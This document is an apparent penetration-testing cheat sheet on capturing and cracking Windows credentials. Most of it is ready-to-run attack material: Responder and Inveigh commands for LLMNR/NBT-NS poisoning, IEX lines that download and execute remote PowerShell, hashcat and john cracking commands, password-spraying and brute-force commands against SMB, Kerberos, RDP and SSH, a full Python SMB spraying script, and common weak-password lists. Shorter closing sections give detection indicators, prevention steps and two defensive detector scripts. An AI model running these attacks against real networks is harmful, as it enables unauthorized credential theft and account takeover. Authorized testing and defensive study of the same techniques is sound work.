Credential Attacks
Capture and crack credentials through network poisoning, password spraying, and brute force attacks against internal network services.
Tool Installation
Required Tools
Kerbrute - Kerberos brute force
go install github.com/ropnop/kerbrute@latest
Inveigh - PowerShell LLMNR/NBNS
IEX (iwr https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Inveigh.ps1)
Hashcat/John - Password crackers
apt install hashcat john (pre-installed on Kali Linux)
LLMNR/NBT-NS Poisoning
When DNS resolution fails, Windows falls back to LLMNR and NBT-NS protocols which can be poisoned to capture NTLMv2 hashes.
Protocols Poisoned: LLMNR (UDP 5355), NBT-NS (UDP 137), mDNS (UDP 5353)
Impact: Capture NTLMv2 hashes for offline cracking or relay
Detection Risk: Medium - generates network traffic anomalies
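The defensive counterpart to the poisoning described above is a canary check: LLMNR reuses the DNS wire format, and a host that answers a query for a name nobody owns is, by construction, answering every query. The following added example (not code from Responder, Inveigh or this page) parses an LLMNR payload and raises an alert when a response carries an A record for one of the constructed canary names; `CANARY_NAMES`, `sample_response` and the 10.0.0.x addresses are assumptions for illustration.

```python
"""LLMNR canary detector (added example, not part of Responder or Inveigh).
LLMNR reuses the DNS wire format on UDP 5355; nobody owns a canary name,
so any response for one comes from a poisoner that answers every query."""
import struct

# Constructed canary hostnames: never registered in DNS or AD, so only a poisoner answers.
CANARY_NAMES = {"fsrv-canary01", "wpad-canary"}

def read_name(data, off):
    """Decode an uncompressed DNS-style label sequence; returns (name, next offset)."""
    labels = []
    while True:
        n = data[off]
        off += 1
        if n == 0:
            return ".".join(labels), off
        labels.append(data[off:off + n].decode("ascii", "replace"))
        off += n

def parse_llmnr(payload):
    """Return (is_response, [question names], [(answer name, IPv4)])."""
    _tid, flags, qd, an, _ns, _ar = struct.unpack("!6H", payload[:12])
    off, questions, answers = 12, [], []
    for _ in range(qd):
        name, off = read_name(payload, off)
        off += 4                                     # skip QTYPE + QCLASS
        questions.append(name)
    for _ in range(an):
        name, off = read_name(payload, off)
        rtype, _rcls, _ttl, rdlen = struct.unpack("!HHIH", payload[off:off + 10])
        off += 10
        if rtype == 1 and rdlen == 4:                # A record
            answers.append((name, ".".join(str(b) for b in payload[off:off + 4])))
        off += rdlen
    return bool(flags & 0x8000), questions, answers

def poisoning_alerts(payload, src_ip):
    """One alert per A answer for a canary name; queries and benign answers give []."""
    is_resp, _q, answers = parse_llmnr(payload)
    return [f"LLMNR poisoning suspected: {src_ip} answered '{n}' with {ip}"
            for n, ip in answers if is_resp and n.lower() in CANARY_NAMES]

def encode_name(name):
    return b"".join(bytes([len(l)]) + l.encode() for l in name.split(".")) + b"\x00"

def sample_response(name, ip):
    """Constructed LLMNR response for testing: one question plus one A answer (TTL 30)."""
    question = encode_name(name) + struct.pack("!HH", 1, 1)
    answer = encode_name(name) + struct.pack("!HHIH", 1, 1, 30, 4) + bytes(int(o) for o in ip.split("."))
    return struct.pack("!6H", 0x1234, 0x8000, 1, 1, 0, 0) + question + answer
```

In production the payloads would come from a UDP 5355 listener or a packet capture, and the canary queries would be sent periodically from a monitoring host.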
Responder - Capture Hashes
# Start Responder on interface
sudo responder -I eth0 -dwPv
# Flags explained:
# -d: Enable answers for DHCP broadcast requests (DHCP poisoning)
# -w: Enable WPAD rogue proxy
# -P: Force NTLM/Basic auth for the rogue proxy (ProxyAuth)
# -F: Force NTLM/Basic auth on wpad.dat file retrieval (used in the aggressive command below)
# -v: Verbose output
# Responder with WPAD proxy (aggressive)
sudo responder -I eth0 -wFPv
# Analyze mode (passive - no poisoning)
sudo responder -I eth0 -A
# Check captured hashes
ls /usr/share/responder/logs/
cat /usr/share/responder/logs/*.txt
Information
Edit /etc/responder/Responder.conf to enable or disable specific services. Disable the SMB and HTTP servers when running Responder together with ntlmrelayx, since both tools cannot listen on the same ports.
Inveigh (PowerShell Alternative)
Use Inveigh when you need to run from a compromised Windows host without uploading external tools.
# Download and import Inveigh
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Inveigh.ps1')
# Or import from disk
Import-Module .\Inveigh.ps1
# Start Inveigh with all options
Invoke-Inveigh -ConsoleOutput Y -LLMNR Y -NBNS Y -mDNS Y -HTTPS Y -Proxy Y
# Minimal footprint (LLMNR/NBNS only)
Invoke-Inveigh -ConsoleOutput Y -LLMNR Y -NBNS Y
# Check captured hashes
Get-Inveigh -NTLMv2
Get-Inveigh -Cleartext
Get-Inveigh -NTLMv2Unique # Unique hashes only
# Stop Inveigh
Stop-Inveigh
# Export captured hashes to file
Get-Inveigh -NTLMv2 | Out-File hashes.txt
Tip
Crack Captured Hashes
Hashcat Mode Reference:
- 5600 - NetNTLMv2 (most common)
- 5500 - NetNTLMv1
- 1000 - NTLM (from SAM/NTDS.dit)
- 13100 - Kerberos TGS-REP (Kerberoast)
- 18200 - Kerberos AS-REP (AS-REP Roast)
# Hashcat - NTLMv2 (basic)
hashcat -m 5600 hashes.txt /usr/share/wordlists/rockyou.txt
# With rules (more effective)
hashcat -m 5600 hashes.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule
# Multiple rule files
hashcat -m 5600 hashes.txt wordlist.txt -r /usr/share/hashcat/rules/best64.rule -r /usr/share/hashcat/rules/toggles1.rule
# Show cracked passwords
hashcat -m 5600 hashes.txt --show
# John the Ripper
john --format=netntlmv2 hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt
john --format=netntlmv2 hashes.txt --show # Show cracked
# Combine with custom wordlist
# Generate company-specific wordlist
echo -e 'Company2024!\nCompany123\nWelcome2Company' > company_words.txt
hashcat -m 5600 hashes.txt company_words.txt -r /usr/share/hashcat/rules/best64.rule
Password Spraying
Test common passwords against many accounts while staying under lockout thresholds.
Danger
Check Password Policy First
# CrackMapExec - get password policy
crackmapexec smb 192.168.1.100 -u '' -p '' --pass-pol
crackmapexec smb 192.168.1.100 -u 'guest' -p '' --pass-pol
# enum4linux-ng (updated version)
enum4linux-ng -P 192.168.1.100
# enum4linux (classic)
enum4linux -P 192.168.1.100
# rpcclient (requires null session)
rpcclient -U '' -N 192.168.1.100 -c 'getdompwinfo'
# LDAP query (with credentials)
ldapsearch -x -H ldap://192.168.1.100 -D 'user@corp.local' -w 'password' -b 'DC=corp,DC=local' '(objectClass=domain)' pwdHistoryLength minPwdAge maxPwdAge minPwdLength lockoutThreshold lockoutDuration
⚠️ Safe Spraying Strategy
- Check lockout threshold (e.g., 5 attempts)
- Check lockout duration/observation window (e.g., 30 minutes)
- Spray ONE password, wait for lockout window to reset
- Spray next password, repeat
- For 30-min lockout window: max 1 password every 35 minutes
Spray with CrackMapExec
# Single password against user list
crackmapexec smb 192.168.1.0/24 -u users.txt -p 'Summer2024!' --continue-on-success
# Multiple passwords (careful with lockout!)
crackmapexec smb 192.168.1.100 -u users.txt -p passwords.txt --no-bruteforce
# Spray against specific services
crackmapexec winrm 192.168.1.100 -u users.txt -p 'Password123!'
crackmapexec ldap 192.168.1.100 -u users.txt -p 'Company2024!'
Kerbrute - Kerberos Spraying
Kerbrute uses Kerberos pre-authentication which is stealthier than SMB. Failed attempts appear as event ID 4771 (vs 4625 for SMB).
# Download Kerbrute
wget https://github.com/ropnop/kerbrute/releases/latest/download/kerbrute_linux_amd64
chmod +x kerbrute_linux_amd64
mv kerbrute_linux_amd64 /usr/local/bin/kerbrute
# Username enumeration (no lockout risk!)
kerbrute userenum -d corp.local --dc 192.168.1.100 users.txt
# Password spray via Kerberos
kerbrute passwordspray -d corp.local --dc 192.168.1.100 users.txt 'Summer2024!'
# With delay between attempts (safer)
kerbrute passwordspray -d corp.local --dc 192.168.1.100 users.txt 'Summer2024!' --delay 100
# Brute force single user (use with caution!)
kerbrute bruteuser -d corp.local --dc 192.168.1.100 passwords.txt administrator
# Save output
kerbrute passwordspray -d corp.local --dc 192.168.1.100 users.txt 'Summer2024!' -o results.txt
Tip
Spray-Passwords.ps1
Part of PowerSploit/Empire - useful for spraying from a compromised Windows host.
# Download DomainPasswordSpray (dafthack), which provides Invoke-DomainPasswordSpray
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/dafthack/DomainPasswordSpray/master/DomainPasswordSpray.ps1')
# Or import a local copy
Import-Module .\DomainPasswordSpray.ps1
# Spray single password against all domain users
Invoke-DomainPasswordSpray -Password 'Summer2024!'
# Against specific user list
Invoke-DomainPasswordSpray -UserList .\users.txt -Password 'Summer2024!'
# With delay between attempts (milliseconds)
Invoke-DomainPasswordSpray -Password 'Summer2024!' -Delay 1000
# Using password list file
Invoke-DomainPasswordSpray -PasswordList .\passwords.txt
# Output to file
Invoke-DomainPasswordSpray -Password 'Summer2024!' -OutFile spray_results.txt
Service Brute Force
Hydra
# SMB brute force
hydra -L users.txt -P passwords.txt smb://192.168.1.100
# RDP brute force
hydra -L users.txt -P passwords.txt rdp://192.168.1.100
# SSH brute force
hydra -L users.txt -P passwords.txt ssh://192.168.1.100
# WinRM brute force
hydra -L users.txt -P passwords.txt http-get://192.168.1.100:5985/wsman
Medusa
# SMB brute force
medusa -h 192.168.1.100 -U users.txt -P passwords.txt -M smbnt
# Multiple hosts
medusa -H hosts.txt -U users.txt -P passwords.txt -M smbnt -T 5
Common Password Patterns
# Seasonal passwords
Summer2024!
Winter2024!
Spring2024!
Fall2024!
# Company-based
[CompanyName]2024!
[CompanyName]123
Welcome2[CompanyName]
# Common patterns
Password1!
P@ssw0rd!
Changeme1!
Qwerty123!
Admin123!
Python Spray Script
#!/usr/bin/env python3
"""Simple SMB Password Sprayer"""
from impacket.smbconnection import SMBConnection
import sys
import time


def spray(target, domain, users_file, password, delay=0):
    """Try one password against every user in users_file (one name per line)."""
    with open(users_file) as f:
        users = [line.strip() for line in f if line.strip()]
    print(f"[*] Spraying {password} against {len(users)} users")
    for user in users:
        conn = None
        try:
            conn = SMBConnection(target, target, timeout=3)
            conn.login(user, password, domain)
            print(f"[+] SUCCESS: {domain}\\{user}:{password}")
        except Exception as e:
            # impacket raises SessionError with the NT status code in its message
            if "STATUS_LOGON_FAILURE" in str(e):
                print(f"[-] Failed: {user}")
            elif "STATUS_ACCOUNT_LOCKED" in str(e):
                print(f"[!] LOCKED: {user}")
            else:
                print(f"[?] {user}: {e}")
        finally:
            if conn:
                conn.close()
        time.sleep(delay)


if __name__ == "__main__":
    if len(sys.argv) < 5:
        sys.exit(f"usage: {sys.argv[0]} <target> <domain> <users_file> <password> [delay_seconds]")
    delay = float(sys.argv[5]) if len(sys.argv) > 5 else 0
    spray(sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4], delay)
Tip
🔍 Detection & Prevention
Blue Team Indicators
Detection Opportunities
- Monitor for LLMNR/NBT-NS traffic on the network (UDP 5355 and 137; mDNS on UDP 5353)
- Windows Event 4648 - Logon with explicit credentials
- Windows Event 4771 - Kerberos pre-auth failures (password spray)
- Multiple failed logins from same source IP
- Unusual SMB traffic patterns
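The 4771/4625 indicators above separate the two attack shapes this page covers: a spray is one source failing against many accounts once or twice each, while brute force is many failures against one account. The following added example (not from the page or any tool it lists) runs that sliding-window triage over a constructed set of Security events; the event tuples, IP addresses and thresholds are assumptions, and a real deployment would feed it parsed event log records.

```python
"""Password-spray vs. brute-force triage over Windows Security events (added
example, not from the page). A spray is one source failing against MANY
accounts a few times each (4771 Kerberos pre-auth failed, 4625 logon failed);
brute force is many failures against ONE account from one source."""
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Constructed sample events: (timestamp, event id, target account, source IP).
SAMPLE_EVENTS = (
    # one source, six accounts, one failure each inside six minutes -> spray
    [(f"2024-06-03 09:0{i}:00", 4771, u, "10.10.5.23")
     for i, u in enumerate(["alice", "bob", "carol", "dave", "erin", "frank"])]
    # one source hammering a single account -> brute force
    + [(f"2024-06-03 09:10:{s:02d}", 4625, "administrator", "10.10.7.9") for s in range(0, 30, 5)]
    # a user mistyping twice -> noise, no verdict
    + [("2024-06-03 09:12:00", 4625, "alice", "10.10.5.40"),
       ("2024-06-03 09:12:30", 4625, "alice", "10.10.5.40")]
)

def classify_sources(events, window=timedelta(minutes=30), min_accounts=5, brute_threshold=5):
    """Slide a time window over each source's failures and label the source
    'spray' (>= min_accounts distinct accounts, at most 2 tries each) or
    'bruteforce' (>= brute_threshold failures against exactly one account).
    Returns {source_ip: (label, sorted account names)}."""
    by_src = defaultdict(list)
    for ts, eid, acct, src in events:
        if eid in (4771, 4625):                       # Kerberos pre-auth / NTLM logon failure
            by_src[src].append((datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"), acct.lower()))
    verdicts = {}
    for src, fails in by_src.items():
        fails.sort()
        lo = 0
        for hi in range(len(fails)):
            while fails[hi][0] - fails[lo][0] > window:   # drop failures older than the window
                lo += 1
            counts = Counter(acct for _, acct in fails[lo:hi + 1])
            if len(counts) >= min_accounts and max(counts.values()) <= 2:
                verdicts[src] = ("spray", sorted(counts))
            elif len(counts) == 1 and max(counts.values()) >= brute_threshold:
                verdicts[src] = ("bruteforce", sorted(counts))
    return verdicts

if __name__ == "__main__":
    for src, (label, accounts) in classify_sources(SAMPLE_EVENTS).items():
        print(f"{src}: {label} against {len(accounts)} account(s): {', '.join(accounts)}")
```

Tune `min_accounts` below the domain lockout threshold so a spray that stays under the threshold per account is still caught across accounts.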
Prevention Measures
- Disable LLMNR via GPO: Computer Configuration → Policies → Administrative Templates → Network → DNS Client → Turn off multicast name resolution
- Disable NBT-NS on all interfaces
- Enforce strong password policy (15+ characters)
- Implement account lockout with smart thresholds
- Deploy EDR to detect Responder/Inveigh
External Resources
Responder
LLMNR/NBT-NS/MDNS Poisoner
Inveigh
PowerShell LLMNR/NBNS/mDNS spoofer
Kerbrute
Kerberos brute force and enumeration
DomainPasswordSpray
PowerShell password spraying tool
Hashcat Wiki
Hash modes and example commands
SecLists
Password lists and usernames
Practice Labs
Practice credential attacks in safe, legal environments